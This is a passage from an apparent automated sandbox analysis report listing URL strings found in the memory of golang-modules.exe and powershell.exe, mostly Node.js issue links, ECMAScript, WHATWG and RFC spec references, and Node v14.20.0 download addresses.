Source: golang-modules.exe, 00000000.00000000.108985935290.00007FF627292000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://github.com/estree/estree/blob/a27003adf4fd7bfad44de9cef372a2eacd527b1c/es5.md#regexpliteral
Source: golang-modules.exe, 00000000.00000000.108985935290.00007FF627292000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://github.com/google/caja/blob/HEAD/src/com/google/caja/ses/repairES5.js
Source: golang-modules.exe, 00000000.00000000.108985935290.00007FF627292000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://github.com/google/caja/blob/HEAD/src/com/google/caja/ses/startSES.js
Source: golang-modules.exe, 00000000.00000000.108985935290.00007FF627292000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://github.com/google/closure-compiler/wiki/Source-Maps
Source: golang-modules.exe, 00000000.00000000.108985935290.00007FF627292000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://github.com/isaacs/color-support.
Source: golang-modules.exe, 00000000.00000000.108985935290.00007FF627292000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://github.com/joyent/node/issues/3295.
Source: golang-modules.exe, 00000000.00000000.108985935290.00007FF627292000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://github.com/libuv/libuv/pull/1501.
Source: golang-modules.exe, 00000000.00000000.108985935290.00007FF627292000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://github.com/mafintosh/end-of-stream
Source: golang-modules.exe, 00000000.00000000.108985935290.00007FF627292000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://github.com/mafintosh/pump
Source: golang-modules.exe, 00000000.00000000.108985935290.00007FF627292000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://github.com/mysticatea/abort-controller
Source: golang-modules.exe, 00000000.00000000.108985935290.00007FF627292000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://github.com/nodejs/node-v0.x-archive/issues/2876.
Source: golang-modules.exe, 00000000.00000000.108985935290.00007FF627292000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://github.com/nodejs/node/commit/ec2822adaad76b126b5cccdeaa1addf2376c9aa6
Source: golang-modules.exe, 00000000.00000000.108985935290.00007FF627292000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://github.com/nodejs/node/commit/f7620fb96d339f704932f9bb9a0dceb9952df2d4
Source: golang-modules.exe, 00000000.00000000.108985935290.00007FF627292000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://github.com/nodejs/node/issues
Source: golang-modules.exe, 00000000.00000000.108985935290.00007FF627292000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://github.com/nodejs/node/issues/10673
Source: golang-modules.exe, 00000000.00000000.108985935290.00007FF627292000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://github.com/nodejs/node/issues/13435
Source: golang-modules.exe, 00000000.00000000.108985935290.00007FF627292000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://github.com/nodejs/node/issues/19009
Source: golang-modules.exe, 00000000.00000000.108985935290.00007FF627292000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://github.com/nodejs/node/issues/2006
Source: golang-modules.exe, 00000000.00000000.108985935290.00007FF627292000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://github.com/nodejs/node/issues/2119
Source: golang-modules.exe, 00000000.00000000.108985935290.00007FF627292000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://github.com/nodejs/node/issues/32020
Source: golang-modules.exe, 00000000.00000000.108985935290.00007FF627292000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://github.com/nodejs/node/issues/3392
Source: golang-modules.exe, 00000000.00000000.108985935290.00007FF627292000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://github.com/nodejs/node/issues/35475
Source: golang-modules.exe, 00000000.00000000.108985935290.00007FF627292000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://github.com/nodejs/node/issues/35981
Source: golang-modules.exe, 00000000.00000000.108985935290.00007FF627292000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://github.com/nodejs/node/issues/39707
Source: golang-modules.exe, 00000000.00000000.108985935290.00007FF627292000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://github.com/nodejs/node/pull/12342
Source: golang-modules.exe, 00000000.00000000.108985935290.00007FF627292000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://github.com/nodejs/node/pull/12607
Source: golang-modules.exe, 00000000.00000000.108985935290.00007FF627292000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://github.com/nodejs/node/pull/13870#discussion_r124515293
Source: golang-modules.exe, 00000000.00000000.108985935290.00007FF627292000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://github.com/nodejs/node/pull/1771#issuecomment-119351671
Source: golang-modules.exe, 00000000.00000000.108985935290.00007FF627292000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://github.com/nodejs/node/pull/21313
Source: golang-modules.exe, 00000000.00000000.108985935290.00007FF627292000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://github.com/nodejs/node/pull/26334.
Source: golang-modules.exe, 00000000.00000000.108985935290.00007FF627292000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://github.com/nodejs/node/pull/30380#issuecomment-552948364
Source: golang-modules.exe, 00000000.00000000.108985935290.00007FF627292000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://github.com/nodejs/node/pull/30958
Source: golang-modules.exe, 00000000.00000003.109042790494.000001F1DB561000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/nodejs/node/pull/33229
Source: golang-modules.exe, 00000000.00000000.108985935290.00007FF627292000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://github.com/nodejs/node/pull/33661
Source: golang-modules.exe, 00000000.00000000.108985935290.00007FF627292000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://github.com/nodejs/node/pull/3394
Source: golang-modules.exe, 00000000.00000000.108985935290.00007FF627292000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://github.com/nodejs/node/pull/34010
Source: golang-modules.exe, 00000000.00000000.108985935290.00007FF627292000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://github.com/nodejs/node/pull/34103#issuecomment-652002364
Source: golang-modules.exe, 00000000.00000000.108985935290.00007FF627292000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://github.com/nodejs/node/pull/34375
Source: golang-modules.exe, 00000000.00000000.108985935290.00007FF627292000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://github.com/nodejs/node/pull/35949#issuecomment-722496598
Source: golang-modules.exe, 00000000.00000003.108991096588.000001F1D9A72000.00000004.00000020.00020000.00000000.sdmp, golang-modules.exe, 00000000.00000000.108985935290.00007FF627292000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://github.com/nodejs/node/pull/38248
Source: golang-modules.exe, 00000000.00000000.108985935290.00007FF627292000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://github.com/nodejs/node/pull/38433#issuecomment-828426932
Source: golang-modules.exe, 00000000.00000000.108985935290.00007FF627292000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://github.com/standard-things/esm/issues/821.
Source: golang-modules.exe, 00000000.00000000.108985935290.00007FF627292000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://github.com/tc39/ecma262/blob/HEAD/LICENSE.md
Source: golang-modules.exe, 00000000.00000000.108985935290.00007FF627292000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://github.com/tc39/ecma262/issues/1209
Source: golang-modules.exe, 00000000.00000000.108985935290.00007FF627292000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://github.com/tc39/proposal-ses/blob/e5271cc42a257a05dcae2fd94713ed2f46c08620/shim/src/freeze.j
Source: golang-modules.exe, 00000000.00000000.108985935290.00007FF627292000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://github.com/tc39/proposal-weakrefs
Source: golang-modules.exe, 00000000.00000003.109035868168.000001F1DD97E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/tlrobinson/long-stack-traces
Source: golang-modules.exe, 00000000.00000003.109026521546.000001F1DBB9C000.00000004.00000020.00020000.00000000.sdmp, golang-modules.exe, 00000000.00000003.109027536897.000001F1DBA8A000.00000004.00000020.00020000.00000000.sdmp, golang-modules.exe, 00000000.00000003.109024772174.000001F1DBB98000.00000004.00000020.00020000.00000000.sdmp, golang-modules.exe, 00000000.00000003.109020915941.000001F1DBB61000.00000004.00000020.00020000.00000000.sdmp, golang-modules.exe, 00000000.00000003.109023842068.000001F1DB909000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/tmpvar/jsdom/blob/aa85b2abf07766ff7bf5c1f6daafb3726f2f2db5/lib/jsdom/living/blob.
Source: golang-modules.exe, 00000000.00000003.109042790494.000001F1DB561000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/vercel/pkg/issues/1589
Source: golang-modules.exe, 00000000.00000003.109030732823.000001F1DB8A3000.00000004.00000020.00020000.00000000.sdmp, golang-modules.exe, 00000000.00000003.109030732823.000001F1DB89F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/webpack/webpack/issues/4175#issuecomment-342931035
Source: powershell.exe, 0000000F.00000002.109086074863.00000161925F9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://go.micro
Source: golang-modules.exe, 00000000.00000000.108985935290.00007FF627292000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://goo.gl/t5IS6M).
Source: golang-modules.exe, 00000000.00000000.108985935290.00007FF627292000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://heycam.github.io/webidl/#define-the-operations
Source: golang-modules.exe, 00000000.00000000.108985935290.00007FF627292000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://heycam.github.io/webidl/#dfn-class-string
Source: golang-modules.exe, 00000000.00000000.108985935290.00007FF627292000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://heycam.github.io/webidl/#dfn-default-iterator-object
Source: golang-modules.exe, 00000000.00000000.108985935290.00007FF627292000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://heycam.github.io/webidl/#dfn-iterator-prototype-object
Source: golang-modules.exe, 00000000.00000000.108985935290.00007FF627292000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://heycam.github.io/webidl/#es-interfaces
Source: golang-modules.exe, 00000000.00000000.108985935290.00007FF627292000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://heycam.github.io/webidl/#es-iterable
Source: golang-modules.exe, 00000000.00000000.108985935290.00007FF627292000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://heycam.github.io/webidl/#es-iterable-entries
Source: golang-modules.exe, 00000000.00000000.108985935290.00007FF627292000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://heycam.github.io/webidl/#es-iterators
Source: golang-modules.exe, 00000000.00000000.108985935290.00007FF627292000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://heycam.github.io/webidl/#es-namespaces
Source: golang-modules.exe, 00000000.00000000.108985935290.00007FF627292000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://heycam.github.io/webidl/#es-operations
Source: golang-modules.exe, 00000000.00000000.108985935290.00007FF627292000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://heycam.github.io/webidl/#es-stringifier
Source: golang-modules.exe, 00000000.00000003.109026521546.000001F1DBB9C000.00000004.00000020.00020000.00000000.sdmp, golang-modules.exe, 00000000.00000003.109027536897.000001F1DBA8A000.00000004.00000020.00020000.00000000.sdmp, golang-modules.exe, 00000000.00000003.109024772174.000001F1DBB98000.00000004.00000020.00020000.00000000.sdmp, golang-modules.exe, 00000000.00000003.109020915941.000001F1DBB61000.00000004.00000020.00020000.00000000.sdmp, golang-modules.exe, 00000000.00000003.109026898269.000001F1DB7C3000.00000004.00000020.00020000.00000000.sdmp, golang-modules.exe, 00000000.00000003.109023842068.000001F1DB909000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://hsivonen.fi/encoding-menu/
Source: golang-modules.exe, 00000000.00000000.108985935290.00007FF627292000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://html.spec.whatwg.org/multipage/browsers.html#ascii-serialisation-of-an-origin
Source: golang-modules.exe, 00000000.00000000.108985935290.00007FF627292000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://html.spec.whatwg.org/multipage/browsers.html#concept-origin-opaque
Source: golang-modules.exe, 00000000.00000000.108985935290.00007FF627292000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://html.spec.whatwg.org/multipage/timers-and-user-prompts.html#dom-setinterval
Source: golang-modules.exe, 00000000.00000000.108985935290.00007FF627292000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://html.spec.whatwg.org/multipage/webappapis.html#windoworworkerglobalscope
Source: golang-modules.exe, 00000000.00000000.108985935290.00007FF627292000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://invisible-island.net/ncurses/terminfo.ti.html#toc-_Specials
Source: golang-modules.exe, 00000000.00000000.108985935290.00007FF627292000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://invisible-island.net/xterm/ctlseqs/ctlseqs.html
Source: golang-modules.exe, 00000000.00000000.108985935290.00007FF627292000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://linux.die.net/man/1/dircolors).
Source: golang-modules.exe, 00000000.00000003.109032560300.000001F1DB67A000.00000004.00000020.00020000.00000000.sdmp, golang-modules.exe, 00000000.00000003.109025264317.000001F1DB93F000.00000004.00000020.00020000.00000000.sdmp, golang-modules.exe, 00000000.00000003.109032292214.000001F1DC542000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://mapbox.com/
Source: golang-modules.exe, 00000000.00000000.108985935290.00007FF627292000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://mathiasbynens.be/notes/javascript-encoding
Source: golang-modules.exe, 00000000.00000000.108985935290.00007FF627292000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://no-color.org/
Source: golang-modules.exe, 00000000.00000000.108985935290.00007FF627292000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://nodejs.org/
Source: golang-modules.exe, 00000000.00000000.108985935290.00007FF627292000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://nodejs.org/api/cli.html#cli_unhandled_rejections_mode).
Source: golang-modules.exe, 00000000.00000000.108985935290.00007FF627292000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://nodejs.org/api/fs.html
Source: golang-modules.exe, 00000000.00000000.108985935290.00007FF627292000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://nodejs.org/download/release/v14.20.0/node-v14.20.0-headers.tar.gz
Source: golang-modules.exe, 00000000.00000000.108985935290.00007FF627292000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://nodejs.org/download/release/v14.20.0/node-v14.20.0.tar.gz
Source: golang-modules.exe, 00000000.00000000.108985935290.00007FF627292000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://nodejs.org/download/release/v14.20.0/node-v14.20.0.tar.gzhttps://nodejs.org/download/release
Source: golang-modules.exe, 00000000.00000000.108985935290.00007FF627292000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://nodejs.org/download/release/v14.20.0/win-x64/node.lib
Source: powershell.exe, 0000000F.00000002.109098880419.00000161A18DC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.109098880419.00000161A179A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.109086074863.00000161925F9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.109149103671.0000015DE5479000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.109149103671.0000015DE55BB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.109116423300.0000015DD668F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
Source: powershell.exe, 0000000F.00000002.109101780210.00000161A9C78000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ocsp.quovadisoffshore.com0
Source: golang-modules.exe, 00000000.00000000.108985935290.00007FF627292000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://sourcemaps.info/spec.html
Source: golang-modules.exe, 00000000.00000000.108985935290.00007FF627292000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://stackoverflow.com/a/5501711/3561
Source: golang-modules.exe, 00000000.00000003.108991096588.000001F1D9A72000.00000004.00000020.00020000.00000000.sdmp, golang-modules.exe, 00000000.00000000.108985935290.00007FF627292000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://tc39.es/ecma262/#sec-%typedarray%-intrinsic-object
Source: golang-modules.exe, 00000000.00000000.108985935290.00007FF627292000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://tc39.es/ecma262/#sec-IsHTMLDDA-internal-slot
Source: golang-modules.exe, 00000000.00000000.108985935290.00007FF627292000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://tc39.github.io/ecma262/#sec-%iteratorprototype%-object
Source: golang-modules.exe, 00000000.00000000.108985935290.00007FF627292000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://tc39.github.io/ecma262/#sec-%typedarray%.of
Source: golang-modules.exe, 00000000.00000000.108985935290.00007FF627292000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://tc39.github.io/ecma262/#sec-object.prototype.tostring
Source: golang-modules.exe, 00000000.00000000.108985935290.00007FF627292000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://tools.ietf.org/html/rfc2397#section-2
Source: golang-modules.exe, 00000000.00000000.108985935290.00007FF627292000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://tools.ietf.org/html/rfc3492#section-3.4
Source: golang-modules.exe, 00000000.00000003.109026521546.000001F1DBB9C000.00000004.00000020.00020000.00000000.sdmp, golang-modules.exe, 00000000.00000003.109027536897.000001F1DBA8A000.00000004.00000020.00020000.00000000.sdmp, golang-modules.exe, 00000000.00000003.109024772174.000001F1DBB98000.00000004.00000020.00020000.00000000.sdmp, golang-modules.exe, 00000000.00000003.109020915941.000001F1DBB61000.00000004.00000020.00020000.00000000.sdmp, golang-modules.exe, 00000000.00000003.109026898269.000001F1DB7C3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://tools.ietf.org/html/rfc3986#section-3.1
Source: golang-modules.exe, 00000000.00000000.108985935290.00007FF627292000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://tools.ietf.org/html/rfc3986#section-3.2.2
Source: golang-modules.exe, 00000000.00000003.109026521546.000001F1DBB9C000.00000004.00000020.00020000.00000000.sdmp, golang-modules.exe, 00000000.00000003.109027536897.000001F1DBA8A000.00000004.00000020.00020000.00000000.sdmp, golang-modules.exe, 00000000.00000003.109024772174.000001F1DBB98000.00000004.00000020.00020000.00000000.sdmp, golang-modules.exe, 00000000.00000003.109020915941.000001F1DBB61000.00000004.00000020.00020000.00000000.sdmp, golang-modules.exe, 00000000.00000003.109026898269.000001F1DB7C3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://tools.ietf.org/html/rfc3986#section-4.3
Source: golang-modules.exe, 00000000.00000000.108985935290.00007FF627292000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://tools.ietf.org/html/rfc6455#section-1.3
Source: golang-modules.exe, 00000000.00000000.108985935290.00007FF627292000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://tools.ietf.org/html/rfc7230#section-3.2.2
Source: golang-modules.exe, 00000000.00000000.108985935290.00007FF627292000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://tools.ietf.org/html/rfc7230#section-3.2.6
Source: golang-modules.exe, 00000000.00000000.108985935290.00007FF627292000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://tools.ietf.org/html/rfc7540#section-8.1.2.5
Source: golang-modules.exe, 00000000.00000000.108985935290.00007FF627292000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://url.spec.whatwg.org/#cannot-have-a-username-password-port
Source: golang-modules.exe, 00000000.00000000.108985935290.00007FF627292000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://url.spec.whatwg.org/#concept-url
Source: golang-modules.exe, 00000000.00000003.109022174020.000001F1DB689000.00000004.00000020.00020000.00000000.sdmp, golang-modules.exe, 00000000.00000000.108985935290.00007FF627292000.00000002.00000001.01000000.00000003.sdmp, golang-modules.exe, 00000000.00000003.109027303836.000001F1DB6AB000.00000004.00000020.00020000.00000000.sdmp, golang-modules.exe, 00000000.00000003.109025862890.000001F1DB689000.00000004.00000020.00020000.00000000.sdmp, golang-modules.exe, 00000000.00000003.109030107125.000001F1DB6B5000.00000004.00000020.00020000.00000000.sdmp, golang-modules.exe, 00000000.00000003.109028138636.000001F1DB6F8000.00000004.00000020.00020000.00000000.sdmp, golang-modules.exe, 00000000.00000003.109025862890.000001F1DB69F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://url.spec.whatwg.org/#concept-url-origin
Source: golang-modules.exe, 00000000.00000000.108985935290.00007FF627292000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://url.spec.whatwg.org/#concept-urlencoded-byte-serializer
Source: golang-modules.exe, 00000000.00000000.108985935290.00007FF627292000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://url.spec.whatwg.org/#concept-urlencoded-parser
Source: golang-modules.exe, 00000000.00000000.108985935290.00007FF627292000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://url.spec.whatwg.org/#concept-urlencoded-serializer
Source: golang-modules.exe, 00000000.00000000.108985935290.00007FF627292000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://url.spec.whatwg.org/#special-scheme
Source: golang-modules.exe, 00000000.00000000.108985935290.00007FF627292000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://url.spec.whatwg.org/#url
Source: golang-modules.exe, 00000000.00000000.108985935290.00007FF627292000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://url.spec.whatwg.org/#urlsearchparams
Source: golang-modules.exe, 00000000.00000000.108985935290.00007FF627292000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://url.spec.whatwg.org/#urlsearchparams-stringification-behavior
Source: golang-modules.exe, 00000000.00000000.108985935290.00007FF627292000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://v8.dev/blog/v8-release-89
Source: golang-modules.exe, 00000000.00000000.108985935290.00007FF627292000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://w3c.github.io/webappsec-subresource-integrity/#the-integrity-attribute
Source: golang-modules.exe, 00000000.00000000.108985935290.00007FF627292000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://wiki.squid-cache.org/SquidFaq/InnerWorkings#What_is_a_half-closed_filedescriptor.3F
Source: golang-modules.exe, 00000000.00000000.108985935290.00007FF627292000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://www.ecma-international.org/ecma-262/#sec-line-terminators
Source: golang-modules.exe, 00000000.00000003.108991096588.000001F1D9A72000.00000004.00000020.00020000.00000000.sdmp, golang-modules.exe, 00000000.00000000.108985935290.00007FF627292000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://www.ecma-international.org/ecma-262/#sec-promise.all
Source: golang-modules.exe, 00000000.00000000.108985935290.00007FF627292000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://www.ecma-international.org/ecma-262/#sec-timeclip
Source: golang-modules.exe, 00000000.00000000.108985935290.00007FF627292000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://www.ecma-international.org/ecma-262/5.1/#sec-15.1.3.4
Source: golang-modules.exe, 00000000.00000000.108985935290.00007FF627292000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://www.ecma-international.org/ecma-262/8.0/#prod-Alternative
Source: golang-modules.exe, 00000000.00000000.108985935290.00007FF627292000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://www.ecma-international.org/ecma-262/8.0/#prod-Atom
Source: golang-modules.exe, 00000000.00000000.108985935290.00007FF627292000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://www.ecma-international.org/ecma-262/8.0/#prod-CharacterClass
Source: golang-modules.exe, 00000000.00000000.108985935290.00007FF627292000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://www.ecma-international.org/ecma-262/8.0/#prod-CharacterClassEscape
Source: golang-modules.exe, 00000000.00000000.108985935290.00007FF627292000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://www.ecma-international.org/ecma-262/8.0/#prod-ClassAtom
Source: golang-modules.exe, 00000000.00000000.108985935290.00007FF627292000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://www.ecma-international.org/ecma-262/8.0/#prod-ClassAtomNoDash
Source: golang-modules.exe, 00000000.00000000.108985935290.00007FF627292000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://www.ecma-international.org/ecma-262/8.0/#prod-ClassRanges
Source: golang-modules.exe, 00000000.00000000.108985935290.00007FF627292000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://www.ecma-international.org/ecma-262/8.0/#prod-ControlEscape
Source: golang-modules.exe, 00000000.00000000.108985935290.00007FF627292000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://www.ecma-international.org/ecma-262/8.0/#prod-ControlLetter
Source: golang-modules.exe, 00000000.00000000.108985935290.00007FF627292000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://www.ecma-international.org/ecma-262/8.0/#prod-DecimalDigits
Source: golang-modules.exe, 00000000.00000000.108985935290.00007FF627292000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://www.ecma-international.org/ecma-262/8.0/#prod-DecimalEscape
Source: golang-modules.exe, 00000000.00000000.108985935290.00007FF627292000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://www.ecma-international.org/ecma-262/8.0/#prod-Disjunction
Source: golang-modules.exe, 00000000.00000000.108985935290.00007FF627292000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://www.ecma-international.org/ecma-262/8.0/#prod-Hex4Digits
Source: golang-modules.exe, 00000000.00000000.108985935290.00007FF627292000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://www.ecma-international.org/ecma-262/8.0/#prod-HexDigit
Source: golang-modules.exe, 00000000.00000000.108985935290.00007FF627292000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://www.ecma-international.org/ecma-262/8.0/#prod-HexDigits
Source: golang-modules.exe, 00000000.00000000.108985935290.00007FF627292000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://www.ecma-international.org/ecma-262/8.0/#prod-HexEscapeSequence
Source: golang-modules.exe, 00000000.00000000.108985935290.00007FF627292000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://www.ecma-international.org/ecma-262/8.0/#prod-NonemptyClassRanges
Source: golang-modules.exe, 00000000.00000000.108985935290.00007FF627292000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://www.ecma-international.org/ecma-262/8.0/#prod-NonemptyClassRangesNoDash
Source: golang-modules.exe, 00000000.00000000.108985935290.00007FF627292000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://www.ecma-international.org/ecma-262/8.0/#prod-OctalDigit
Source: golang-modules.exe, 00000000.00000000.108985935290.00007FF627292000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://www.ecma-international.org/ecma-262/8.0/#prod-Pattern
Source: golang-modules.exe, 00000000.00000000.108985935290.00007FF627292000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://www.ecma-international.org/ecma-262/8.0/#prod-PatternCharacter
Source: golang-modules.exe, 00000000.00000000.108985935290.00007FF627292000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://www.ecma-international.org/ecma-262/8.0/#prod-Quantifier
Source: golang-modules.exe, 00000000.00000000.108985935290.00007FF627292000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://www.ecma-international.org/ecma-262/8.0/#prod-QuantifierPrefix
Source: golang-modules.exe, 00000000.00000000.108985935290.00007FF627292000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://www.ecma-international.org/ecma-262/8.0/#prod-RegExpUnicodeEscapeSequence
Source: golang-modules.exe, 00000000.00000000.108985935290.00007FF627292000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://www.ecma-international.org/ecma-262/8.0/#prod-SyntaxCharacter
Source: golang-modules.exe, 00000000.00000000.108985935290.00007FF627292000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://www.ecma-international.org/ecma-262/8.0/#prod-annexB-Assertion
Source: golang-modules.exe, 00000000.00000000.108985935290.00007FF627292000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://www.ecma-international.org/ecma-262/8.0/#prod-annexB-AtomEscape
Source: golang-modules.exe, 00000000.00000000.108985935290.00007FF627292000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://www.ecma-international.org/ecma-262/8.0/#prod-annexB-CharacterEscape
Source: golang-modules.exe, 00000000.00000000.108985935290.00007FF627292000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://www.ecma-international.org/ecma-262/8.0/#prod-annexB-ClassControlLetter
